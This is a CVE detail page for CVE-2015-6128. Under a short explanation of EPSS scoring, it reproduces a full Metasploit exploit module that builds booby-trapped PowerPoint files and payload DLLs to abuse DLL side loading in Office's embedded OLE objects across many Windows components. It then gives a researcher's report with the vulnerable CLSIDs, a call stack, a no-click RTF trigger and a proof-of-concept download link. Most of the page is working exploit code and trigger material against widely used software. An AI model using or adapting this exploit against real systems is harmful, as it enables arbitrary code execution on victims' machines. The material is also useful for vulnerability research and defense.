CVE-2015-6128 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

require 'zip' require 'base64' require 'msf/core' require 'rex/ole' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Office OLE Multiple DLL Side Loading Vulnerabilities', 'Description' => %q{ Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker's DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system. }, 'Author' => 'Yorick Koster', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-6132'], ['CVE', '2015-6128'], ['CVE', '2015-6133'], ['CVE', '2016-0041'], ['CVE', '2016-0100'], ['CVE', '2016-3235'], ['MSB', 'MS15-132'], ['MSB', 'MS16-014'], ['MSB', 'MS16-025'], ['MSB', 'MS16-041'], ['MSB', 'MS16-070'], ['URL', 'https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html'], ['URL', 'https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html'], ['URL', 'https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/exec', 'CMD' => 'C:\\Windows\\System32\\calc.exe', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'All', {} ], [ 'COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)', { 'DLL' => 'mqrt.dll', # {ecabafc9-7f19-11d2-978e-0000f8757e2a} 'CLSID' => "\xC9\xAF\xAB\xEC\x19\x7F\xD2\x11\x97\x8E\x00\x00\xF8\x75\x7E\x2A" } ], [ 'Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)', { 'DLL' => 'spframe.dll', # {D27CDB6E-AE6D-11cf-96B8-444553540000} 'CLSID' => "\x6E\xDB\x7C\xD2\x6D\xAE\xCF\x11\x96\xB8\x44\x45\x53\x54\x00\x00" } ], [ 'Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)', { 'DLL' => 'wuaext.dll', # {D93CE8B5-3BF8-462C-A03F-DED2730078BA} 'CLSID' => "\xB5\xE8\x3C\xD9\xF8\x3B\x2C\x46\xA0\x3F\xDE\xD2\x73\x00\x78\xBA" } ], [ 'Shutdown UX / Windows 10 / Office 2016 (MS15-132)', { 'DLL' => 'wuaext.dll', # {14ce31dc-abc2-484c-b061-cf3416aed8ff} 'CLSID' => "\xDC\x31\xCE\x14\xC2\xAB\x4C\x48\xB0\x61\xCF\x34\x16\xAE\xD8\xFF" } ], [ 'MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)', { 'DLL' => 'phoneinfo.dll', # {B9033E87-33CF-4D77-BC9B-895AFBBA72E4} 'CLSID' => "\x87\x3E\x03\xB9\xCF\x33\x77\x4D\xBC\x9B\x89\x5A\xFB\xBA\x72\xE4" } ], [ 'Microsoft Visio 2010 / Windows 7 (MS16-070)', { 'DLL' => 'msoutls.dll', # 6C92B806-B900-4392-89F7-2ED4B4C23211} 'CLSID' => "\x06\xB8\x92\x6C\x00\xB9\x92\x43\x89\xF7\x2E\xD4\xB4\xC2\x32\x11" } ], [ 'Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)', { 'DLL' => 'elsext.dll', # {394C052E-B830-11D0-9A86-00C04FD8DBF7} 'CLSID' => "\x2E\x05\x4C\x39\x30\xB8\xD0\x11\x9A\x86\x00\xC0\x4F\xD8\xDB\xF7" } ], [ 'OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)', { 'DLL' => 'oci.dll', # {e8cc4cbf-fdff-11d0-b865-00a0c9081c1d} 'CLSID' => "\xBF\x4C\xCC\xE8\xFF\xFD\xD0\x11\xB8\x65\x00\xA0\xC9\x08\x1C\x1D" } ], [ 'Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)', { 'DLL' => 'wab32res.dll', # {32714800-2E5F-11d0-8B85-00AA0044F941} 'CLSID' => "\x00\x48\x71\x32\x5F\x2E\xD0\x11\x8B\x85\x00\xAA\x00\x44\xF9\x41" } ], [ 'NPS Datastore server / Windows Vista / Office 2010 (MS16-014)', { 'DLL' => 'iasdatastore2.dll', # {48da6741-1bf0-4a44-8325-293086c79077} 'CLSID' => "\x41\x67\xDA\x48\xF0\x1B\x44\x4A\x83\x25\x29\x30\x86\xC7\x90\x77" } ], [ 'BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)', { 'DLL' => 'ehTrace.dll', # {FC772AB0-0C7F-11D3-8FF2-00A0C9224CF4} 'CLSID' => "\xB0\x2A\x77\xFC\x7F\x0C\xD3\x11\x8F\xF2\x00\xA0\xC9\x22\x4C\xF4" } ], ], 'Privileged' => false, 'DisclosureDate' => 'Dec 8 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']), ], self.class) end def exploit if target.name == 'All' targets = @targets else targets = [ target ] end @arch.each do |a| exploit_regenerate_payload('win', a, nil) targets.each do |t| if t.name == 'All' next end print_status("Using target #{t.name}") dll_name = t['DLL'] if target.name == 'All' ppsx_name = t.name.split(/\//).first + ".ppsx" else ppsx_name = datastore['FILENAME'] end print_status("Creating the payload DLL (#{a})...") opts = {} opts[:arch] = [ a ] dll = generate_payload_dll(opts) dll_path = store_file(dll, a, dll_name) print_good("#{dll_name} stored at #{dll_path}, copy it to a remote share") print_status("Creating the PPSX file...") ppsx = get_ppsx(t['CLSID']) ppsx_path = store_file(ppsx, a, ppsx_name) print_good("#{ppsx_name} stored at #{ppsx_path}, copy it to a remote share") end end end def store_file(data, subdir, filename) ltype = "exploit.fileformat.#{self.shortname}" if ! ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end subdir.gsub!(/[^a-z0-9\.\_\-]+/i, '') if ! ::File.directory?(Msf::Config.local_directory + "/" + subdir) FileUtils.mkdir_p(Msf::Config.local_directory + "/" + subdir) end if filename and not filename.empty? if filename =~ /(.*)\.(.*)/ ext = $2 fname = $1 else fname = filename end else fname = "local_#{Time.now.utc.to_i}" end fname = ::File.split(fname).last fname.gsub!(/[^a-z0-9\.\_\-]+/i, '') fname << ".#{ext}" path = File.join(Msf::Config.local_directory + "/" + subdir, fname) full_path = ::File.expand_path(path) File.open(full_path, "wb") { |fd| fd.write(data) } report_note(:data => full_path.dup, :type => "#{ltype}.localpath") full_path.dup end def create_ole(clsid) ole_tmp = Rex::Quickfile.new('ole') stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) stm = stg.create_stream("\x01OLE10Native") stm.close directory = stg.instance_variable_get(:@directory) directory.each_entry do |entry| if entry.instance_variable_get(:@_ab) == 'Root Entry' clsid = Rex::OLE::CLSID.new(clsid) entry.instance_variable_set(:@_clsId, clsid) end end # write to disk stg.close ole_contents = File.read(ole_tmp.path) ole_tmp.close ole_tmp.unlink ole_contents end def get_ppsx(clsid) path = ::File.join(Msf::Config.data_directory, 'exploits', 'office_ole_multiple_dll_hijack.ppsx') fd = ::File.open(path, "rb") data = fd.read(fd.stat.size) fd.close ppsx = Rex::Zip::Archive.new Zip::InputStream.open(StringIO.new(data)) do |zis| while entry = zis.get_next_entry ppsx.add_file(entry.name, zis.read) end end ppsx.add_file('/ppt/embeddings/oleObject1.bin', create_ole(clsid)) ppsx.pack end end

Source: https://code.google.com/p/google-security-research/issues/detail?id=514 It is possible for an attacker to execute a DLL planting attack in Microsoft Office with a specially crafted OLE object. Testing was performed on a Windows 7 x64 virtual machine with Office 2013 installed and the latest updates applied. The attached POC document "planted.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {394c052e-b830-11d0-9a86-00c04fd8dbf7} (formatted as pack(">IHHBBBBBBBB")) which is one of several registered objects that have an InProcServer32 of els.dll. Other options include: {975797fc-4e2a-11d0-b702-00c04fd8dbf7} and {f778c6b4-c08b-11d2-976c-00c04f79db19}. When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to els!DllGetClassObject() which does a LoadLibraryW() call for elsext.dll (and riched32.dll but that's already loaded in winword.exe). If the attached elsext.dll is placed in the same directory with the planted.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word. Here is the call stack leading up to the vulnerable LoadLibraryW() call. Also, it appears there are private symbols for ole32.dll on the public symbol server again. 0:000> kb ChildEBP RetAddr Args to Child 005982a4 60e94cca 60e92464 9582fa74 00000000 kernel32!LoadLibraryW 00598538 60e94d71 00000000 0059857c 60ea3209 els!WinbaseIsolationAwarePrivatetRgzlnPgpgk+0x1a8 00598544 60ea3209 00598560 9582fa30 00000000 els!IsolationAwarePrivatenPgViNgRzlnPgpgk+0x30 0059857c 60ea36b6 9582f680 60ea6d20 007cbfe8 els!IsolationAwareInitCommonControls+0x28 005989cc 60e933d1 60e94377 0360ac4c 60ea6ce1 els!InitGlobals+0x2c3 005989d0 60e94377 0360ac4c 60ea6ce1 005990a4 els!CDll::AddRef+0xe 005989d8 60ea6ce1 005990a4 036087e0 00000000 els!CComponentDataCF::CComponentDataCF+0x10 005989ec 75bbaec6 0360ac3c 75bbee84 00598a94 els!DllGetClassObject+0x77 00598a08 75b991cd 0360ac3c 75bbee84 00598a94 ole32!CClassCache::CDllPathEntry::DllGetClassObject+0x30 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3324] 00598a20 75b98e92 00598a34 75bbee84 00598a94 ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+0x1f [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3831] 00598a58 75b98c37 00598a9c 00000000 005990a4 ole32!CClassCache::GetClassObject+0x49 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 4582] 00598ad4 75bb3170 75cb6444 00000000 005990a4 ole32!CServerContextActivator::CreateInstance+0x110 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 974] 00598b14 75b98daa 005990a4 00000000 00599614 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 00598b68 75b98d1f 75cb646c 00000000 005990a4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268] 00598b88 75b98aa2 75cb6494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737] 00598ba8 75b98a53 75cb6494 00598f00 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630] 00598be4 75b98e0d 75cb6494 00598f00 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487] 00598c0c 75bb3170 75cb6494 00000000 005990a4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377] 00598c4c 75bb2ef4 005990a4 00000000 00599614 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 00598eac 75bb3170 75cb6448 00000000 005990a4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685] 00598eec 75bb3098 005990a4 00000000 00599614 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 005996c8 75bb9e25 005997e4 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334] 00599728 75bb9d86 005997e4 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343] 0059974c 75bb9d3f 005997e4 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157] 0059977c 75bd154c 005997e4 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110] 005997f8 75bcf2af 394c052e 11d0b830 c000869a ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046] 0059985c 75bcf1d4 16260820 00000000 5f7a6600 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576] 00599884 703bca10 16260820 5f7a6600 097b2f00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495] WARNING: Stack unwind information not available. Following frames may be wrong. 005998f8 5fb7efb2 16260820 5f7a6600 097b2f00 mso!Ordinal4743+0x7c 00599948 5fb7eeb9 09775da8 16260820 5f7a6600 wwlib!DllGetLCID+0x3bc330 It is also possible to trigger this DLL load without a user click with the following RTF document: {\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7b394c052e-b830-11d0-9a86-00c04fd8dbf7\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}} Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38918.zip